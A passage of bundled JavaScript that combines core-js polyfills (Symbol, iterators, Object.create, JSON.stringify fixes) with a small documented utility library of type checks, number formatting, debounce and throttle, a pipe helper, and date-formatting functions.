iframeDocument.write(lt + 'script' + gt + 'document.F=Object' + lt + '/script' + gt);
iframeDocument.close();
createDict = iframeDocument.F;
while (i--) delete createDict[PROTOTYPE$1][_enumBugKeys[i]];
return createDict();
};
var _objectCreate = Object.create || function create(O, Properties) {
var result;
if (O !== null) {
Empty[PROTOTYPE$1] = _anObject(O);
result = new Empty();
Empty[PROTOTYPE$1] = null; // add "__proto__" for Object.getPrototypeOf polyfill
result[IE_PROTO$1] = O;
} else result = createDict();
return Properties === undefined ? result : _objectDps(result, Properties);
};
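// Object.create fallback: a throwaway Empty constructor covers non-null
// prototypes, while a null prototype reuses a dictionary object built inside a
// hidden <iframe> (createDict) whose prototype has the enum-bug keys deleted.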
var gOPN = _objectGopn.f;
var toString$1 = {}.toString;
var windowNames = typeof window == 'object' && window && Object.getOwnPropertyNames ? Object.getOwnPropertyNames(window) : [];
var getWindowNames = function (it) {
try {
return gOPN(it);
} catch (e) {
return windowNames.slice();
}
};
var f$6 = function getOwnPropertyNames(it) {
return windowNames && toString$1.call(it) == '[object Window]' ? getWindowNames(it) : gOPN(_toIobject(it));
};
var _objectGopnExt = {
f: f$6
};
var META = _meta.KEY;
var gOPD$1 = _objectGopd.f;
var dP$1 = _objectDp.f;
var gOPN$1 = _objectGopnExt.f;
var $Symbol = _global.Symbol;
var $JSON = _global.JSON;
var _stringify = $JSON && $JSON.stringify;
var PROTOTYPE$2 = 'prototype';
var HIDDEN = _wks('_hidden');
var TO_PRIMITIVE = _wks('toPrimitive');
var isEnum = {}.propertyIsEnumerable;
var SymbolRegistry = _shared('symbol-registry');
var AllSymbols = _shared('symbols');
var OPSymbols = _shared('op-symbols');
var ObjectProto = Object[PROTOTYPE$2];
var USE_NATIVE = typeof $Symbol == 'function' && !!_objectGops.f;
var QObject = _global.QObject; // Don't use setters in Qt Script, https://github.com/zloirock/core-js/issues/173
var setter = !QObject || !QObject[PROTOTYPE$2] || !QObject[PROTOTYPE$2].findChild; // fallback for old Android, https://code.google.com/p/v8/issues/detail?id=687
var setSymbolDesc = _descriptors && _fails(function () {
return _objectCreate(dP$1({}, 'a', {
get: function () {
return dP$1(this, 'a', {
value: 7
}).a;
}
})).a != 7;
}) ? function (it, key, D) {
var protoDesc = gOPD$1(ObjectProto, key);
if (protoDesc) delete ObjectProto[key];
dP$1(it, key, D);
if (protoDesc && it !== ObjectProto) dP$1(ObjectProto, key, protoDesc);
} : dP$1;
var wrap = function (tag) {
var sym = AllSymbols[tag] = _objectCreate($Symbol[PROTOTYPE$2]);
sym._k = tag;
return sym;
};
var isSymbol = USE_NATIVE && typeof $Symbol.iterator == 'symbol' ? function (it) {
return typeof it == 'symbol';
} : function (it) {
return it instanceof $Symbol;
};
var $defineProperty = function defineProperty(it, key, D) {
if (it === ObjectProto) $defineProperty(OPSymbols, key, D);
_anObject(it);
key = _toPrimitive(key, true);
_anObject(D);
if (_has(AllSymbols, key)) {
if (!D.enumerable) {
if (!_has(it, HIDDEN)) dP$1(it, HIDDEN, _propertyDesc(1, {}));
it[HIDDEN][key] = true;
} else {
if (_has(it, HIDDEN) && it[HIDDEN][key]) it[HIDDEN][key] = false;
D = _objectCreate(D, {
enumerable: _propertyDesc(0, false)
});
}
return setSymbolDesc(it, key, D);
}
return dP$1(it, key, D);
};
var $defineProperties = function defineProperties(it, P) {
_anObject(it);
var keys = _enumKeys(P = _toIobject(P));
var i = 0;
var l = keys.length;
var key;
while (l > i) $defineProperty(it, key = keys[i++], P[key]);
return it;
};
var $create = function create(it, P) {
return P === undefined ? _objectCreate(it) : $defineProperties(_objectCreate(it), P);
};
var $propertyIsEnumerable = function propertyIsEnumerable(key) {
var E = isEnum.call(this, key = _toPrimitive(key, true));
if (this === ObjectProto && _has(AllSymbols, key) && !_has(OPSymbols, key)) return false;
return E || !_has(this, key) || !_has(AllSymbols, key) || _has(this, HIDDEN) && this[HIDDEN][key] ? E : true;
};
var $getOwnPropertyDescriptor$1 = function getOwnPropertyDescriptor(it, key) {
it = _toIobject(it);
key = _toPrimitive(key, true);
if (it === ObjectProto && _has(AllSymbols, key) && !_has(OPSymbols, key)) return;
var D = gOPD$1(it, key);
if (D && _has(AllSymbols, key) && !(_has(it, HIDDEN) && it[HIDDEN][key])) D.enumerable = true;
return D;
};
var $getOwnPropertyNames = function getOwnPropertyNames(it) {
var names = gOPN$1(_toIobject(it));
var result = [];
var i = 0;
var key;
while (names.length > i) {
if (!_has(AllSymbols, key = names[i++]) && key != HIDDEN && key != META) result.push(key);
}
return result;
};
var $getOwnPropertySymbols = function getOwnPropertySymbols(it) {
var IS_OP = it === ObjectProto;
var names = gOPN$1(IS_OP ? OPSymbols : _toIobject(it));
var result = [];
var i = 0;
var key;
while (names.length > i) {
if (_has(AllSymbols, key = names[i++]) && (IS_OP ? _has(ObjectProto, key) : true)) result.push(AllSymbols[key]);
}
return result;
}; // 19.4.1.1 Symbol([description])
if (!USE_NATIVE) {
$Symbol = function Symbol() {
if (this instanceof $Symbol) throw TypeError('Symbol is not a constructor!');
var tag = _uid(arguments.length > 0 ? arguments[0] : undefined);
var $set = function (value) {
if (this === ObjectProto) $set.call(OPSymbols, value);
if (_has(this, HIDDEN) && _has(this[HIDDEN], tag)) this[HIDDEN][tag] = false;
setSymbolDesc(this, tag, _propertyDesc(1, value));
};
if (_descriptors && setter) setSymbolDesc(ObjectProto, tag, {
configurable: true,
set: $set
});
return wrap(tag);
};
_redefine($Symbol[PROTOTYPE$2], 'toString', function toString() {
return this._k;
});
_objectGopd.f = $getOwnPropertyDescriptor$1;
_objectDp.f = $defineProperty;
_objectGopn.f = _objectGopnExt.f = $getOwnPropertyNames;
_objectPie.f = $propertyIsEnumerable;
_objectGops.f = $getOwnPropertySymbols;
if (_descriptors && !_library) {
_redefine(ObjectProto, 'propertyIsEnumerable', $propertyIsEnumerable, true);
}
_wksExt.f = function (name) {
return wrap(_wks(name));
};
}
_export(_export.G + _export.W + _export.F * !USE_NATIVE, {
Symbol: $Symbol
});
for (var es6Symbols = // ES6 well-known symbols
'hasInstance,isConcatSpreadable,iterator,match,replace,search,species,split,toPrimitive,toStringTag,unscopables'.split(','), j = 0; es6Symbols.length > j;) _wks(es6Symbols[j++]);
for (var wellKnownSymbols = _objectKeys(_wks.store), k = 0; wellKnownSymbols.length > k;) _wksDefine(wellKnownSymbols[k++]);
_export(_export.S + _export.F * !USE_NATIVE, 'Symbol', {
// 19.4.2.1 Symbol.for(key)
'for': function (key) {
return _has(SymbolRegistry, key += '') ? SymbolRegistry[key] : SymbolRegistry[key] = $Symbol(key);
},
// 19.4.2.5 Symbol.keyFor(sym)
keyFor: function keyFor(sym) {
if (!isSymbol(sym)) throw TypeError(sym + ' is not a symbol!');
for (var key in SymbolRegistry) if (SymbolRegistry[key] === sym) return key;
},
useSetter: function () {
setter = true;
},
useSimple: function () {
setter = false;
}
});
_export(_export.S + _export.F * !USE_NATIVE, 'Object', {
// 19.1.2.2 Object.create(O [, Properties])
create: $create,
// 19.1.2.4 Object.defineProperty(O, P, Attributes)
defineProperty: $defineProperty,
// 19.1.2.3 Object.defineProperties(O, Properties)
defineProperties: $defineProperties,
// 19.1.2.6 Object.getOwnPropertyDescriptor(O, P)
getOwnPropertyDescriptor: $getOwnPropertyDescriptor$1,
// 19.1.2.7 Object.getOwnPropertyNames(O)
getOwnPropertyNames: $getOwnPropertyNames,
// 19.1.2.8 Object.getOwnPropertySymbols(O)
getOwnPropertySymbols: $getOwnPropertySymbols
}); // Chrome 38 and 39 `Object.getOwnPropertySymbols` fails on primitives
// https://bugs.chromium.org/p/v8/issues/detail?id=3443
var FAILS_ON_PRIMITIVES = _fails(function () {
_objectGops.f(1);
});
_export(_export.S + _export.F * FAILS_ON_PRIMITIVES, 'Object', {
getOwnPropertySymbols: function getOwnPropertySymbols(it) {
return _objectGops.f(_toObject(it));
}
}); // 24.3.2 JSON.stringify(value [, replacer [, space]])
$JSON && _export(_export.S + _export.F * (!USE_NATIVE || _fails(function () {
var S = $Symbol(); // MS Edge converts symbol values to JSON as {}
// WebKit converts symbol values to JSON as null
// V8 throws on boxed symbols
return _stringify([S]) != '[null]' || _stringify({
a: S
}) != '{}' || _stringify(Object(S)) != '{}';
})), 'JSON', {
stringify: function stringify(it) {
var args = [it];
var i = 1;
var replacer, $replacer;
while (arguments.length > i) args.push(arguments[i++]);
$replacer = replacer = args[1];
if (!_isObject(replacer) && it === undefined || isSymbol(it)) return; // IE8 returns string on undefined
if (!_isArray(replacer)) replacer = function (key, value) {
if (typeof $replacer == 'function') value = $replacer.call(this, key, value);
if (!isSymbol(value)) return value;
};
args[1] = replacer;
return _stringify.apply($JSON, args);
}
}); // 19.4.3.4 Symbol.prototype[@@toPrimitive](hint)
$Symbol[PROTOTYPE$2][TO_PRIMITIVE] || _hide($Symbol[PROTOTYPE$2], TO_PRIMITIVE, $Symbol[PROTOTYPE$2].valueOf); // 19.4.3.5 Symbol.prototype[@@toStringTag]
_setToStringTag($Symbol, 'Symbol'); // 20.2.1.9 Math[@@toStringTag]
_setToStringTag(Math, 'Math', true); // 24.3.3 JSON[@@toStringTag]
_setToStringTag(_global.JSON, 'JSON', true);
var getOwnPropertySymbols = _core.Object.getOwnPropertySymbols;
var getOwnPropertySymbols$1 = getOwnPropertySymbols;
_objectSap('keys', function () {
return function keys(it) {
return _objectKeys(_toObject(it));
};
});
var keys = _core.Object.keys;
var keys$1 = keys;
function _defineProperty(obj, key, value) {
if (key in obj) {
defineProperty$1(obj, key, {
value: value,
enumerable: true,
configurable: true,
writable: true
});
} else {
obj[key] = value;
}
return obj;
}
var defineProperty$3 = _defineProperty;
var version = "3.2.1";
_export(_export.S, 'Array', {
isArray: _isArray
});
var isArray = _core.Array.isArray;
var isArray$1 = isArray;
// false -> String#codePointAt
var _stringAt = function (TO_STRING) {
return function (that, pos) {
var s = String(_defined(that));
var i = _toInteger(pos);
var l = s.length;
var a, b;
if (i < 0 || i >= l) return TO_STRING ? '' : undefined;
a = s.charCodeAt(i);
return a < 0xd800 || a > 0xdbff || i + 1 === l || (b = s.charCodeAt(i + 1)) < 0xdc00 || b > 0xdfff ? TO_STRING ? s.charAt(i) : a : TO_STRING ? s.slice(i, i + 2) : (a - 0xd800 << 10) + (b - 0xdc00) + 0x10000;
};
};
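// _stringAt(true) behaves like String#at (returns the full code point as a
// string); _stringAt(false) behaves like String#codePointAt. Both treat a valid
// surrogate pair as a single unit.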
var _iterators = {};
var IteratorPrototype = {}; // 25.1.2.1.1 %IteratorPrototype%[@@iterator]()
_hide(IteratorPrototype, _wks('iterator'), function () {
return this;
});
var _iterCreate = function (Constructor, NAME, next) {
Constructor.prototype = _objectCreate(IteratorPrototype, {
next: _propertyDesc(1, next)
});
_setToStringTag(Constructor, NAME + ' Iterator');
};
var IE_PROTO$2 = _sharedKey('IE_PROTO');
var ObjectProto$1 = Object.prototype;
var _objectGpo = Object.getPrototypeOf || function (O) {
O = _toObject(O);
if (_has(O, IE_PROTO$2)) return O[IE_PROTO$2];
if (typeof O.constructor == 'function' && O instanceof O.constructor) {
return O.constructor.prototype;
}
return O instanceof Object ? ObjectProto$1 : null;
};
var ITERATOR = _wks('iterator');
var BUGGY = !([].keys && 'next' in [].keys()); // Safari has buggy iterators w/o `next`
var FF_ITERATOR = '@@iterator';
var KEYS = 'keys';
var VALUES = 'values';
var returnThis = function () {
return this;
};
var _iterDefine = function (Base, NAME, Constructor, next, DEFAULT, IS_SET, FORCED) {
_iterCreate(Constructor, NAME, next);
var getMethod = function (kind) {
if (!BUGGY && kind in proto) return proto[kind];
switch (kind) {
case KEYS:
return function keys() {
return new Constructor(this, kind);
};
case VALUES:
return function values() {
return new Constructor(this, kind);
};
}
return function entries() {
return new Constructor(this, kind);
};
};
var TAG = NAME + ' Iterator';
var DEF_VALUES = DEFAULT == VALUES;
var VALUES_BUG = false;
var proto = Base.prototype;
var $native = proto[ITERATOR] || proto[FF_ITERATOR] || DEFAULT && proto[DEFAULT];
var $default = $native || getMethod(DEFAULT);
var $entries = DEFAULT ? !DEF_VALUES ? $default : getMethod('entries') : undefined;
var $anyNative = NAME == 'Array' ? proto.entries || $native : $native;
var methods, key, IteratorPrototype; // Fix native
if ($anyNative) {
IteratorPrototype = _objectGpo($anyNative.call(new Base()));
if (IteratorPrototype !== Object.prototype && IteratorPrototype.next) {
// Set @@toStringTag to native iterators
_setToStringTag(IteratorPrototype, TAG, true); // fix for some old engines
if (!_library && typeof IteratorPrototype[ITERATOR] != 'function') _hide(IteratorPrototype, ITERATOR, returnThis);
}
} // fix Array#{values, @@iterator}.name in V8 / FF
if (DEF_VALUES && $native && $native.name !== VALUES) {
VALUES_BUG = true;
$default = function values() {
return $native.call(this);
};
} // Define iterator
if ((!_library || FORCED) && (BUGGY || VALUES_BUG || !proto[ITERATOR])) {
_hide(proto, ITERATOR, $default);
} // Plug for library
_iterators[NAME] = $default;
_iterators[TAG] = returnThis;
if (DEFAULT) {
methods = {
values: DEF_VALUES ? $default : getMethod(VALUES),
keys: IS_SET ? $default : getMethod(KEYS),
entries: $entries
};
if (FORCED) for (key in methods) {
if (!(key in proto)) _redefine(proto, key, methods[key]);
} else _export(_export.P + _export.F * (BUGGY || VALUES_BUG), NAME, methods);
}
return methods;
};
var $at = _stringAt(true); // String.prototype[@@iterator]()
_iterDefine(String, 'String', function (iterated) {
this._t = String(iterated); // target
this._i = 0; // next index
// 21.1.5.2.1 %StringIteratorPrototype%.next()
}, function () {
var O = this._t;
var index = this._i;
var point;
if (index >= O.length) return {
value: undefined,
done: true
};
point = $at(O, index);
this._i += point.length;
return {
value: point,
done: false
};
});
var _iterStep = function (done, value) {
return {
value: value,
done: !!done
};
};
// Array.prototype.keys()
// Array.prototype.values()
// Array.prototype[@@iterator]()
var es6_array_iterator = _iterDefine(Array, 'Array', function (iterated, kind) {
this._t = _toIobject(iterated); // target
this._i = 0; // next index
this._k = kind; // kind
// 22.1.5.2.1 %ArrayIteratorPrototype%.next()
}, function () {
var O = this._t;
var kind = this._k;
var index = this._i++;
if (!O || index >= O.length) {
this._t = undefined;
return _iterStep(1);
}
if (kind == 'keys') return _iterStep(0, index);
if (kind == 'values') return _iterStep(0, O[index]);
return _iterStep(0, [index, O[index]]);
}, 'values'); // argumentsList[@@iterator] is %ArrayProto_values% (9.4.4.6, 9.4.4.7)
_iterators.Arguments = _iterators.Array;
var TO_STRING_TAG = _wks('toStringTag');
var DOMIterables = ('CSSRuleList,CSSStyleDeclaration,CSSValueList,ClientRectList,DOMRectList,DOMStringList,' + 'DOMTokenList,DataTransferItemList,FileList,HTMLAllCollection,HTMLCollection,HTMLFormElement,HTMLSelectElement,' + 'MediaList,MimeTypeArray,NamedNodeMap,NodeList,PaintRequestList,Plugin,PluginArray,SVGLengthList,SVGNumberList,' + 'SVGPathSegList,SVGPointList,SVGStringList,SVGTransformList,SourceBufferList,StyleSheetList,TextTrackCueList,' + 'TextTrackList,TouchList').split(',');
for (var i = 0; i < DOMIterables.length; i++) {
var NAME = DOMIterables[i];
var Collection = _global[NAME];
var proto = Collection && Collection.prototype;
if (proto && !proto[TO_STRING_TAG]) _hide(proto, TO_STRING_TAG, NAME);
_iterators[NAME] = _iterators.Array;
}
var iterator = _wksExt.f('iterator');
var iterator$1 = iterator;
_wksDefine('asyncIterator');
_wksDefine('observable');
var symbol = _core.Symbol;
var symbol$1 = symbol;
var _typeof_1 = createCommonjsModule(function (module) {
function _typeof2(obj) {
if (typeof symbol$1 === "function" && typeof iterator$1 === "symbol") {
_typeof2 = function _typeof2(obj) {
return typeof obj;
};
} else {
_typeof2 = function _typeof2(obj) {
return obj && typeof symbol$1 === "function" && obj.constructor === symbol$1 && obj !== symbol$1.prototype ? "symbol" : typeof obj;
};
}
return _typeof2(obj);
}
function _typeof(obj) {
if (typeof symbol$1 === "function" && _typeof2(iterator$1) === "symbol") {
module.exports = _typeof = function _typeof(obj) {
return _typeof2(obj);
};
} else {
module.exports = _typeof = function _typeof(obj) {
return obj && typeof symbol$1 === "function" && obj.constructor === symbol$1 && obj !== symbol$1.prototype ? "symbol" : _typeof2(obj);
};
}
return _typeof(obj);
}
module.exports = _typeof;
});
/** @module Type */
/**
 * Returns the type of val as a lowercase string.
 * @function getType
 * @param {*} val - The value to inspect.
 * @return {string}
 * @example
 * U.getType(new Set([1, 2]))
 * // => 'set'
 */
var getType = function getType(val) {
return isUndefined(val) ? 'undefined' : isNull(val) ? 'null' : val.constructor.name.toLowerCase();
};
/**
 * Checks whether value is of type number (via typeof). Returns a boolean.
 * @function isNumber
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isNumber(3)
 * // => true
 *
 * U.isNumber(Number.MIN_VALUE)
 * // => true
 *
 * U.isNumber(Infinity)
 * // => true
 *
 * U.isNumber('3')
 * // => false
 */
var isNumber = function isNumber(value) {
return typeof value === 'number';
};
/**
 * Checks whether value is a string (via typeof). Returns a boolean.
 * @function isString
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isString(3)
 * // => false
 *
 * U.isString('3')
 * // => true
 */
var isString = function isString(value) {
return typeof value === 'string';
};
/**
 * Checks whether value is null (strict equality). Returns a boolean.
 * @function isNull
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isNull(3)
 * // => false
 *
 * U.isNull(null)
 * // => true
 */
var isNull = function isNull(value) {
return value === null;
};
/**
 * Checks whether value is undefined (strict equality). Returns a boolean.
 * @function isUndefined
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isUndefined(undefined)
 * // => true
 *
 * U.isUndefined(null)
 * // => false
 */
var isUndefined = function isUndefined(value) {
return value === undefined;
};
/**
 * Checks whether value is a boolean (via typeof). Returns a boolean.
 * @function isBoolean
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isBoolean(false)
 * // => true
 *
 * U.isBoolean(null)
 * // => false
 */
var isBoolean = function isBoolean(value) {
return typeof value === 'boolean';
};
/**
 * Checks whether value is a symbol (via typeof). Returns a boolean.
 * @function isSymbol
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isSymbol(Symbol('x'))
 * // => true
 */
var isSymbol$1 = function isSymbol(value) {
return _typeof_1(value) === 'symbol';
};
/**
 * Checks whether value is a function (via typeof). Returns a boolean.
 * @function isFunction
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isFunction(3)
 * // => false
 *
 * U.isFunction(function () {})
 * // => true
 */
var isFunction = function isFunction(value) {
return typeof value === 'function';
};
/**
 * Checks whether arr is an array, using Array.isArray. Returns a boolean.
 * @function isArray
 * @param {*} arr - The value to check.
 * @return {boolean}
 * @example
 * U.isArray([])
 * // => true
 *
 * U.isArray(null)
 * // => false
 */
var isArray$2 = function isArray(arr) {
return isArray$1(arr);
};
/**
 * Checks whether value is an object (arrays excluded). Returns a boolean.
 * @function isObject
 * @param {*} value - The value to check.
 * @return {boolean}
 * @example
 * U.isObject(null)
 * // => false
 *
 * U.isObject([1, 2])
 * // => false
 *
 * U.isObject({})
 * // => true
 */
var isObject = function isObject(value) {
return value instanceof Object && !isArray$2(value);
};
var floor$1 = Math.floor;
var _isInteger = function isInteger(it) {
return !_isObject(it) && isFinite(it) && floor$1(it) === it;
};
_export(_export.S, 'Number', {
isInteger: _isInteger
});
var isInteger = _core.Number.isInteger;
var isInteger$1 = isInteger;
/**
 * Checks whether the given value is an integer. Returns a boolean.
 * @function isInt
 * @param {*} val - The value to check.
 * @return {boolean}
 * @example
 * U.isInt(0)
 * // => true
 *
 * U.isInt(1.15)
 * // => false
 *
 * U.isInt('3')
 * // => false
 */
var isInt = function isInt(val) {
return isInteger$1(val);
};
/**
 * Formats a number as a thousands-separated string. Returns the formatted
 * string when value is numeric (null yields '0'), otherwise NaN.
 * @function toThousands
 * @param {number|string} value - The value to format.
 * @param {string} [separator=','] - Optional separator character.
 * @returns {string|NaN}
 * @example
 * U.toThousands(-1545454)
 * // => '-1,545,454'
 *
 * U.toThousands(1545454.1545)
 * // => '1,545,454.1545'
 *
 * U.toThousands('1545454.1545', '-')
 * // => '1-545-454.1545'
 *
 * U.toThousands(0)
 * // => '0'
 *
 * U.toThousands(null)
 * // => '0'
 *
 * U.toThousands(undefined)
 * // => NaN
 */
var toThousands = function toThousands(value) {
var separator = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : ',';
return isNull(value) ? '0' : isNaN(Number(value)) ? NaN : "".concat(value).split('.').map(function (v, i) {
return i === 0 ? v.replace(/([-|+]?\d)(?=(\d{3})+$)/g, "$1".concat(separator)) : v;
}).join('.');
};
/**
 * Checks whether a number lies between two bounds. When end is omitted, the
 * range is [0, start); if start is greater than end, the bounds are swapped.
 * @function inRange
 * @param {number} value - The number to test.
 * @param {number} [start=0] - Lower bound; acts as the upper bound when end is omitted.
 * @param {number} end - Upper bound (exclusive).
 * @return {boolean}
 * @example
 * U.inRange(5, 4)
 * // => false
 *
 * U.inRange(5, 7)
 * // => true
 *
 * U.inRange(5, 4, 7)
 * // => true
 *
 * U.inRange(5, 7, 10)
 * // => false
 *
 * U.inRange(5, 10, 7)
 * // => false
 */
var inRange = function inRange(value, start) {
var end = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : null;
if (end && start > end) {
var _ref = [start, end];
end = _ref[0];
start = _ref[1];
}
return isNull(end) ? value >= 0 && value < start : value >= start && value < end;
};
/**
 * Rounds a number to a given number of decimal places.
 * @function round
 * @param {number} val - The number to round.
 * @param {number} [decimals=0] - Optional number of decimal places, 0 by default.
 * @return {number}
 * @example
 * U.round(1.2006, 3)
 * // => 1.201
 *
 * U.round(1.2006)
 * // => 1
 */
var round = function round(val) {
var decimals = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
return Number("".concat(Math.round("".concat(val, "e").concat(decimals)), "e-").concat(decimals));
};
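// round note: the string-exponent trick above sidesteps binary floating-point
// error. For instance, Math.round(1.005 * 100) / 100 yields 1 (because
// 1.005 * 100 === 100.49999999999999), whereas round(1.005, 2) rounds
// "1.005e2" -> 101 -> 1.01.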
/**
 * Generates a random number between start and end.
 * @function random
 * @param {number} start - Optional bound.
 * @param {number} end - Optional bound.
 * @return {number}
 * @example
 * const a = U.random()
 * // => 0 < a < 1
 *
 * const b = U.random(3)
 * // => 0 < b < 3
 *
 * const c = U.random(3, 5)
 * // => 3 < c < 5
 *
 * const d = U.random(5, 3)
 * // => 3 < d < 5
 *
 * const e = U.random(-1)
 * // => -1 < e < 0
 *
 * const f = U.random(-1, 1)
 * // => -1 < f < 1
 */
var random = function random(start, end) {
return start && end ? Math.random() * Math.abs(start - end) + Math.min(start, end) : Math.random() * (start || end || 1);
};
/**
 * Keeps a fixed number of decimal places (truncating, not rounding).
 * @function keepFixed
 * @param {number|string} val - The value.
 * @param {number} precision - Non-negative integer, number of decimal places to keep.
 * @param {boolean} [useFiller=true] - Optional, whether to pad with zeros when there are not enough decimals, true by default.
 * @return {string}
 * @example
 * U.keepFixed(-15.12, 4)
 * // => '-15.1200'
 *
 * U.keepFixed(15.1234, 2)
 * // => '15.12'
 */
var keepFixed = function keepFixed(val, precision) {
var useFiller = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : true;
var i = "".concat(val).indexOf('.');
if (i < 0) {
return useFiller ? "".concat(val, ".").concat('0'.repeat(precision)) : "".concat(val);
}
i += precision + 1;
val = "".concat(val).substring(0, i);
return useFiller ? val.padEnd(i, '0') : val;
};
/**
 * Returns the average of the given numbers.
 * @function average
 * @param {...number} args - Numbers to average.
 * @return {number}
 * @example
 * U.average(10, 20)
 * // => 15
 *
 * U.average(-10, -20, 30, 40)
 * // => 10
 */
var average = function average() {
for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return args.reduce(function (acc, v) {
return acc + v;
}, 0) / args.length;
};
_export(_export.S, 'Date', {
now: function () {
return new Date().getTime();
}
});
var now = _core.Date.now;
var now$1 = now;
/** @module Function */
/**
 * Wraps fn so that it can only be invoked once; later calls return undefined.
 * @function once
 * @param {function} fn - The function to wrap.
 * @return {function}
 * @example
 * const fn = once(() => '5')
 * console.log([fn(), fn()])
 * // => ['5', undefined]
 */
var once = function once(fn) {
var called = false;
return function () {
if (called) return;
called = true;
for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return fn.apply(this, args);
};
};
/**
 * Wraps fn into a debounced function: the call is delayed until no invocation
 * has happened for `delay` milliseconds.
 * @function debounce
 * @param {function} fn - The function to debounce.
 * @param {number} [delay=0] - Optional debounce delay in ms, 0 by default.
 * @returns {function}
 * @example
 * window.addEventListener('resize', U.debounce(() => {
 *   console.log(window.innerWidth);
 *   console.log(window.innerHeight);
 * }, 250));
 * // => once resizing stops, the window size is logged a single time 250ms later
 */
var debounce = function debounce(fn) {
var delay = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
var timeoutId;
return function () {
var _this = this;
for (var _len2 = arguments.length, args = new Array(_len2), _key2 = 0; _key2 < _len2; _key2++) {
args[_key2] = arguments[_key2];
}
clearTimeout(timeoutId);
timeoutId = setTimeout(function () {
return fn.apply(_this, args);
}, delay);
};
};
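// debounce note: each call clears the pending timer, so only the trailing
// invocation runs, with the latest arguments and the latest `this`.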
/**
 * Wraps fn into a throttled function that runs at most once per `wait` milliseconds.
 * @function throttle
 * @param {function} fn - The function to throttle.
 * @param {number} wait - Throttle interval in ms.
 * @return {function}
 * @example
 * window.addEventListener('resize', U.throttle(function(evt) {
 *   console.log(window.innerWidth);
 *   console.log(window.innerHeight);
 * }, 250));
 * // while resizing, the window size is logged at most once every 250ms
 */
var throttle = function throttle(fn, wait) {
var inThrottle, lastFn, lastTime;
return function () {
var context = this,
args = arguments;
if (!inThrottle) {
fn.apply(context, args);
lastTime = now$1();
inThrottle = true;
} else {
clearTimeout(lastFn);
lastFn = setTimeout(function () {
if (now$1() - lastTime >= wait) {
fn.apply(context, args);
lastTime = now$1();
}
}, Math.max(wait - (now$1() - lastTime), 0));
}
};
};
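// throttle note: the first call runs immediately; calls made during the wait
// window collapse into a single trailing invocation with the latest arguments.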
/**
 * Pipeline helper. The placeholder "$" stands for the result of the previous
 * step, so pipe(x, `a |> b($, y)`) is equivalent to b(a(x), y).
 * @function pipe
 * @param {*} param - Initial argument.
 * @param {string} line - Pipeline expression.
 * @return {*}
 * @example
 * const x = 1;
 * const y = 3;
 *
 * const a = n => n + 1;
 * const b = (x, y)=> x * y;
 * const c = n => n * n;
 *
 * pipe(x, `a |> b($, y)`)
 * // => 6
 *
 * pipe(x, `a |> c`)
 * // => 4
 */
var pipe = function pipe(param, line) {
return line.split('|>').reduce(function (acc, fn) {
fn = fn.indexOf('(') > -1 ? fn.replace(/[\(|,]\s*\$\s*[\)|,]/g, function (w) {
return w.replace('$', 'acc');
}) : "".concat(fn, "(acc)");
return acc = new Function('acc', 'return ' + fn)(acc);
}, param);
};
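// pipe caveat (not in the original docs): each segment is evaluated with
// new Function, so the names used in `line` (a, b, y above) must be reachable
// from global scope — block-scoped or module-local functions will not resolve.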
/** @module Date */
/**
 * Formats a date; date may be anything new Date() can convert to a Date object.
 * @function dateFormat
 * @param {date} [date=new Date()] - Optional date to format, defaults to now.
 * @param {string} [format='YYYY-MM-DD'] - Optional format string, 'YYYY-MM-DD' by default.
 * @return {string}
 * @example
 * U.dateFormat(new Date(2018, 11, 10))
 * // => '2018-12-10'
 *
 * U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
 * // => '2018-12-10 10:29:36'
 *
 * U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
 * // => '2018-12-22 21:20:48'
 */
var dateFormat = function dateFormat() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var format = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'YYYY-MM-DD';
var d = new Date(date);
var zeroize = function zeroize(val) {
return val < 10 ? "0".concat(val) : "".concat(val);
};
return format.replace(/YYYY|MM|DD|hh|mm|ss/g, function (word) {
return {
'YYYY': d.getFullYear(),
'MM': zeroize(d.getMonth() + 1),
'DD': zeroize(d.getDate()),
'hh': zeroize(d.getHours()),
'mm': zeroize(d.getMinutes()),
'ss': zeroize(d.getSeconds())
}[word] || word;
});
};
/**
 * Returns the number of days in the month of date; date may be anything
 * new Date() can convert to a Date object.
 * @function getMonthDays
 * @param {date} [date=new Date()] - Optional date, defaults to now.
 * @return {number}
 * @example
 * U.getMonthDays(new Date(2018, 1))
 * // => 28
 *
 * U.getMonthDays(153454878787)
 * // => 30
 */
var getMonthDays = function getMonthDays() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() + 1);
d.setDate(0);
return d.getDate();
};
/**
 * Returns the weekday name; lang selects the output language. date may be
 * anything new Date() can convert to a Date object.
 * @function getWeekday
 * @param {string} [lang='zh'] - Optional output language, 'zh' (Chinese, default) or 'en' (English).
 * @param {date} [date=new Date()] - Optional date, defaults to the current date.
 * @return {string}
 * @example
 * U.getWeekday('zh', new Date(2018, 1, 1))
 * // => '星期四'
 *
 * U.getWeekday('zh', '2018/2/1')
 * // => '星期四'
 *
 * U.getWeekday('en', 153454878787)
 * // => 'Tuesday'
 */
var getWeekday = function getWeekday() {
var lang = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'zh';
var date = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : new Date();
var day = new Date(date).getDay();
return lang === 'en' ? ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'][day] : '星期' + '日一二三四五六'.charAt(day);
